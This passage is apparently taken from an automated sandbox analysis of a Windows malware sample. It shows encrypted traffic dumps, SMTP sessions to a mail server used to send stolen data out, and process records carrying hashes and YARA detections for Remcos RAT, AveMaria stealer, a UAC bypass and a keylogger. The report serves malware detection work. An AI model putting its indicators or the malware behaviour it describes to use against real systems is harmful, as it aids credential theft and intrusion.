f3 c3 a2 90 a8 7e 59 fc 78 18 49 19 76 79 4f ca 0f 78 d2 09 ac 7b bd 27 d7 87 49 d7 ec 4c c4 60 9a 61 5f
                                                                                              Data Ascii: Khy5;>OOK:d]Db}%}Sw(ON <8TM&m*m~BWVxK'=vl_).;zPUDr]G.IcLRp;<jNq5r/!ZaG_>IHlsi8H3!'(~YxIvyOx{'IL`a_
                                                                                              2021-12-07 12:39:07 UTC2242INData Raw: 3c 3b 62 85 f9 bc 30 ed 14 6d 31 aa 52 95 30 06 6c 66 ec b6 aa e9 e7 ea 90 bb d4 1c 1d e1 69 3c a2 09 80 a1 de af 99 f8 91 0f c8 25 74 93 4e 0c ae 66 c0 d9 92 79 17 ef 28 c9 9d 14 8d 71 15 8f a7 13 c7 25 35 e1 29 c0 e3 c8 47 87 d6 0f 4f 54 de 24 9c 94 c7 a1 da f8 38 d4 43 d4 f1 8f 0c ef e1 38 d4 28 80 af da ab e3 7c 6c 77 0c d3 82 a1 3e cf 13 9b c4 c2 b4 bf cb 29 4d 74 86 2a 77 3f 80 d0 03 85 91 b4 4d f7 5c 0f dd 94 50 31 a0 91 81 ce b8 98 65 68 ec 41 9d cf 45 83 07 f5 c1 72 f2 cc 1f e3 1a 37 1e e6 1b 85 0e d9 37 c6 d0 60 22 7c f0 65 3e 40 61 67 e5 36 dd 83 39 77 20 8f 8d 3e ae 02 8b ef 34 bd 5a 2f ed 91 de ca e5 11 22 8a 38 41 44 1d b3 57 2a aa 08 57 1a e7 f8 ce 96 e8 ee 1f 26 f9 ca 99 04 4b df 30 91 3c 43 8c 1a f5 56 ed ab 87 be 96 0d 93 18 d2 d5 5e 64
                                                                                              Data Ascii: <;b0m1R0lfi<%tNfy(q%5)GOT$8C8(|lw>)Mt*w?M\P1ehAEr77`"|e>@ag69w >4Z/"8ADW*W&K0<CV^d
                                                                                              2021-12-07 12:39:07 UTC2250INData Raw: 6f 9f 3c 7f f8 f4 85 5f e5 d4 81 db b2 fc cd b6 45 32 40 d5 1d 34 53 47 91 8a 50 12 94 fb 4d 5a 93 87 a7 53 d7 2f c3 f7 29 28 b9 fb b0 a8 86 7d 95 dd c8 f5 0a 1d 16 55 e9 2b ab 62 5f 75 04 45 57 9f a0 fa d8 57 e5 13 c6 3c d3 8c 75 8c 93 b6 30 ad 88 a1 4e ed 14 82 85 fd 24 47 bc 94 22 d0 26 bb e7 2a 7c 9b 52 fe e4 b8 25 d4 81 b4 a3 fe e6 b7 26 a6 05 83 79 5b bd 94 23 a8 a7 8b c4 94 94 ca 11 81 b3 11 98 87 5a 8d 59 7c b9 08 80 16 62 a4 c2 ec 09 bf 0e e9 ab cd bd 8d 17 24 17 d1 17 ec 9a 77 96 16 ab 1f e5 ea fb 9b 3c 20 2c 9b 65 0d df a4 1a 96 aa ee 2f f5 52 d6 92 d8 93 bf 95 aa 17 6b c1 be 4a 8f 03 db 8f bc f1 58 aa fe 54 88 ac 42 65 fa a6 1a a1 c1 75 fe 13 11 ef 78 f0 83 6f ad b6 dc 54 bb aa af 15 e4 a4 3c 37 e3 26 6f ef fc ea 63 e4 47 66 e1 67 53 82 35 16
                                                                                              Data Ascii: o<_E2@4SGPMZS/)(}U+b_uEWW<u0N$G"&*|R%&y[#ZY|b$w< ,e/RkJXTBeuxoT<7&ocGfgS5
                                                                                              2021-12-07 12:39:07 UTC2258INData Raw: 4d 5c bc aa ab 2f b2 d7 90 cd 3f 7a 03 4d 9c 20 07 a0 ed 04 81 53 95 bd 55 d1 2b 94 e1 57 17 d9 57 dd dd cd 78 bd ea 41 22 6a 2a 3c 9b 05 68 ed 79 9e 00 3c 79 2b 99 26 a6 78 2c 26 02 4b 89 66 66 c3 54 ab 18 7e 0a 9b 89 f4 05 6a 76 70 2f d1 9c c5 67 f1 94 50 36 5a bf 53 0f f7 3f d2 90 e7 4d b5 6f 99 d8 1d ea 67 df 88 5f 2b 05 c0 3c aa fb 11 c8 eb 8e 83 bd e9 a5 dc d4 8d 99 34 4c e1 19 ae f0 ca f4 e5 50 29 5d 74 1a 54 48 a1 bc 26 da 20 9a 80 ae 87 b1 04 f4 54 c3 82 6a d4 ec 59 96 92 b3 67 5c 68 90 ff 93 a3 22 06 a4 bd a8 c5 8a 94 d7 e8 a6 d4 a7 35 f9 52 c5 7c 1a 7c f9 5b 62 e6 b6 4e 0a 88 94 75 2b 53 e9 b3 77 ac a0 09 8f 4c 2e 2a 2b 56 2f a1 f3 85 eb b3 03 8f ad 62 6c 60 ae e2 b8 ff 58 ee 8a 54 73 f0 29 9d 56 d5 f6 bb 51 90 8f d0 06 85 0b 0d 06 29 ef 2c a8
                                                                                              Data Ascii: M\/?zM SU+WWxA"j*<hy<y+&x,&KffT~jvp/gP6ZS?Mog_+<4LP)]tTH& TjYg\h"5R||[bNu+SwL.*+V/bl`XTs)VQ),
                                                                                              2021-12-07 12:39:07 UTC2266INData Raw: 55 98 5e a5 59 62 5a a0 70 6d 68 7d 85 69 1a 6a 1d 7a 98 48 b4 7b 3d e7 bb f8 99 c4 1c 2d d0 08 7a be ea 58 96 37 ab ea d8 45 de 73 ab 8e 65 7b 5f ae 3a 76 ad fd fe ab e8 20 a3 63 ee 15 b6 aa f6 79 55 c7 8c f6 fb c8 71 42 45 6a fb 72 60 c4 a4 8a b4 76 6f 84 ce f6 45 9e f6 7b 8b 58 cb 3c 2e 5f fb 2a f2 3c 8e dc ec ab 7e 4c 5f 4b 36 b4 7f 6e e4 4a a2 2a 08 5e 7e 81 e2 7e 49 f1 a1 e4 dc 95 a7 43 93 7c 51 ef aa f6 ec bc 5a fb c4 90 71 02 e0 82 18 98 89 7c cf 2b d0 f1 79 29 29 eb eb 38 eb 2c fb 2a 2f 3f 5c 64 5f 75 1b b9 ca 70 b3 8f 72 2a 20 e0 7e 0a d9 63 09 75 3a 32 82 44 d7 fd fc ea 3e 05 94 a9 f7 68 c0 fd 3c 3e 51 0d 46 c8 e2 07 52 f1 56 59 fc 8d b2 f0 4f b5 c2 b9 1c 9b 56 8e 99 1f ae 5d 01 e5 15 b7 fd fe 2f 40 f7 25 74 ee 25 33 da 49 ed bd b9 8d 94 17 aa
                                                                                              Data Ascii: U^YbZpmh}ijzH{=-zX7Ese{_:v cyUqBEjr`voE{X<._*<~L_K6nJ*^~~IC|QZq|+y))8,*/?\d_upr* ~cu:2D>h<>QFRVYOV]/@%t%3I
                                                                                              2021-12-07 12:39:07 UTC2273INData Raw: c9 d3 08 99 40 27 60 0e c9 07 98 47 f2 01 2e 21 f9 00 0b 48 3e c0 2d 24 1f 60 21 c9 07 78 98 5c 8f 09 af 94 5c 0f bc 46 ae 07 de 23 d7 93 89 f0 0a ae 07 36 03 36 03 b6 03 76 00 ba 01 95 40 15 d0 01 13 63 10 b0 31 30 82 a4 07 ea 49 7a 60 2a 49 0f 9c 44 d2 03 e7 93 f4 98 28 57 93 f4 c0 4d 24 3d 70 07 49 07 2c 22 e9 80 65 24 1d 26 cc 0a 92 0e 58 45 d2 01 9d cb 11 0f 74 01 3a 60 c2 74 03 36 06 f2 80 4d 80 2a 12 0f 0c 24 f1 ee a8 0f 89 07 ea 49 3c 30 95 84 63 c2 9c 44 c2 81 b3 48 38 70 3e 09 87 82 9b 4f c2 81 eb 49 38 70 1b 09 c7 c3 24 fb 48 38 b0 98 84 03 4b 49 38 26 d4 6b c4 0f bc 47 fc f8 e6 09 f5 2b fc c0 66 40 07 4c a8 ed 88 1f e8 46 10 13 29 8f 60 20 ea 49 10 c7 b2 81 04 31 41 86 03 9d 26 41 4e 81 1d 80 a9 40 32 17 f6 63 e7 70 32 c7 67 22 6c 02 bb 66 92


                                                                                              SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 7, 2021 13:40:11.177175999 CET | 587 | 49767 | 66.29.159.53 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
Dec 7, 2021 13:40:11.177797079 CET | 49767 | 587 | 192.168.2.4 | 66.29.159.53 | EHLO 405464
Dec 7, 2021 13:40:11.343246937 CET | 587 | 49767 | 66.29.159.53 | 192.168.2.4 | 250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
Dec 7, 2021 13:40:11.343624115 CET | 49767 | 587 | 192.168.2.4 | 66.29.159.53 | STARTTLS
Dec 7, 2021 13:40:11.508748055 CET | 587 | 49767 | 66.29.159.53 | 192.168.2.4 | 220 Ready to start TLS
Dec 7, 2021 13:40:12.552344084 CET | 587 | 49768 | 66.29.159.53 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
Dec 7, 2021 13:40:12.552918911 CET | 49768 | 587 | 192.168.2.4 | 66.29.159.53 | EHLO 405464
Dec 7, 2021 13:40:12.718250036 CET | 587 | 49768 | 66.29.159.53 | 192.168.2.4 | 250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
Dec 7, 2021 13:40:12.718624115 CET | 49768 | 587 | 192.168.2.4 | 66.29.159.53 | STARTTLS
Dec 7, 2021 13:40:12.883874893 CET | 587 | 49768 | 66.29.159.53 | 192.168.2.4 | 220 Ready to start TLS
Dec 7, 2021 13:40:15.971216917 CET | 587 | 49770 | 66.29.159.53 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
Dec 7, 2021 13:40:15.971534014 CET | 49770 | 587 | 192.168.2.4 | 66.29.159.53 | EHLO 405464
Dec 7, 2021 13:40:16.130117893 CET | 587 | 49770 | 66.29.159.53 | 192.168.2.4 | 250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
Dec 7, 2021 13:40:16.130337000 CET | 49770 | 587 | 192.168.2.4 | 66.29.159.53 | STARTTLS
Dec 7, 2021 13:40:16.288464069 CET | 587 | 49770 | 66.29.159.53 | 192.168.2.4 | 220 Ready to start TLS
Dec 7, 2021 13:40:19.484025002 CET | 587 | 49771 | 66.29.159.53 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
Dec 7, 2021 13:40:19.491142035 CET | 49771 | 587 | 192.168.2.4 | 66.29.159.53 | EHLO 405464
Dec 7, 2021 13:40:19.649755955 CET | 587 | 49771 | 66.29.159.53 | 192.168.2.4 | 250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
Dec 7, 2021 13:40:19.650131941 CET | 49771 | 587 | 192.168.2.4 | 66.29.159.53 | STARTTLS
Dec 7, 2021 13:40:19.808478117 CET | 587 | 49771 | 66.29.159.53 | 192.168.2.4 | 220 Ready to start TLS
Dec 7, 2021 13:40:24.818486929 CET | 587 | 49774 | 66.29.159.53 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
Dec 7, 2021 13:40:24.820207119 CET | 49774 | 587 | 192.168.2.4 | 66.29.159.53 | EHLO 405464
Dec 7, 2021 13:40:24.978636026 CET | 587 | 49774 | 66.29.159.53 | 192.168.2.4 | 250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
Dec 7, 2021 13:40:24.978931904 CET | 49774 | 587 | 192.168.2.4 | 66.29.159.53 | STARTTLS
Dec 7, 2021 13:40:25.136991978 CET | 587 | 49774 | 66.29.159.53 | 192.168.2.4 | 220 Ready to start TLS
Dec 7, 2021 13:40:30.229645014 CET | 587 | 49777 | 66.29.159.53 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
Dec 7, 2021 13:40:30.229912996 CET | 49777 | 587 | 192.168.2.4 | 66.29.159.53 | EHLO 405464
Dec 7, 2021 13:40:30.388430119 CET | 587 | 49777 | 66.29.159.53 | 192.168.2.4 | 250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
Dec 7, 2021 13:40:30.388719082 CET | 49777 | 587 | 192.168.2.4 | 66.29.159.53 | STARTTLS
Dec 7, 2021 13:40:30.546871901 CET | 587 | 49777 | 66.29.159.53 | 192.168.2.4 | 220 Ready to start TLS
Dec 7, 2021 13:40:35.311477900 CET | 587 | 49779 | 66.29.159.53 | 192.168.2.4 | 220 PrivateEmail.com prod Mail Node
Dec 7, 2021 13:40:35.311795950 CET | 49779 | 587 | 192.168.2.4 | 66.29.159.53 | EHLO 405464
Dec 7, 2021 13:40:35.470155001 CET | 587 | 49779 | 66.29.159.53 | 192.168.2.4 | 250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
Dec 7, 2021 13:40:35.470421076 CET | 49779 | 587 | 192.168.2.4 | 66.29.159.53 | STARTTLS
Dec 7, 2021 13:40:35.628663063 CET | 587 | 49779 | 66.29.159.53 | 192.168.2.4 | 220 Ready to start TLS

                                                                                              System Behavior

                                                                                              General

Start time: 13:38:32
Start date: 07/12/2021
Path: C:\Users\user\Desktop\xxTzyGLZx5.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\xxTzyGLZx5.exe"
Imagebase: 0x400000
File size: 833414 bytes
MD5 hash: D5F570694F0847CAEA18CCAC8837B052
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: unknown
                                                                                              Reputation:low

                                                                                              General

Start time: 13:38:35
Start date: 07/12/2021
Path: C:\Users\user\Desktop\xxTzyGLZx5.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\xxTzyGLZx5.exe"
Imagebase: 0x400000
File size: 833414 bytes
MD5 hash: D5F570694F0847CAEA18CCAC8837B052
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              Reputation:low

                                                                                              General

Start time: 13:38:41
Start date: 07/12/2021
Path: C:\Users\user\AppData\Local\Temp\bin.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\bin.exe" 0
Imagebase: 0xd0000
File size: 115712 bytes
MD5 hash: 805FBB84293E86F25B566A5B2C2815D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.929833680.000000000021F000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.929833680.000000000021F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.684248310.0000000000D0E000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.684248310.0000000000D0E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000000.680273151.000000000021F000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000000.680273151.000000000021F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: AveMaria_WarZone, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:13:38:42
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.701188305.000000000065A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
